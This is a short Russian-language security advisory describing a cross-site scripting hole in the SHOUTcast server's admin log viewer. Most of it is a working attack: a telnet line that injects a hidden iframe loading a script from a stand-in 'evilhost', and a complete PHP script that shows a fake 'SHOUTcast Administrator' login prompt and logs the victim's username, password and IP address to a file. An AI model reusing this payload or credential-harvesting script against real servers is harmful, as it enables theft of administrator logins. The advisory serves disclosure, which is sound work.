SHOUTcast - Winamp система потокового аудио от Nullsoft. 

Уязвимость в проверке правильности ввода обнаружена в SHOUTcast сервере. Удаленный пользователь может выполнить XSS нападение против администратора SHOUTcast. Пример: 

telnet localhost 8001
<IFrame src=http://evilhost/script.php width=0 height=0></iframe>changeme

Где script.php: 
<?php 
$fp = fopen("log.txt","a+");
if (!isset( $_SERVER["PHP_AUTH_USER"] )) { 
header( 'WWW-Authenticate: Basic realm="Shoutcast Server"' ); 
header( 'HTTP/1.0 401 Unauthorized' ); 
echo '<HTML><HEAD>Unauthorized<title>SHOUTcast 
Administrator</title></HEAD></HTML>';
exit; 
} else { 
fwrite($fp,'|' . $_SERVER["PHP_AUTH_USER"] . '|' . 
$_SERVER["PHP_AUTH_PW"] . '|' . $_SERVER["REMOTE_ADDR"] . $content);
}
fclose($fp);
?> 

Произвольный код сценария будет выполнен в браузере администратора системы, когда он
просматривает Log файлы в административном интерфейсе.

Оставить мнение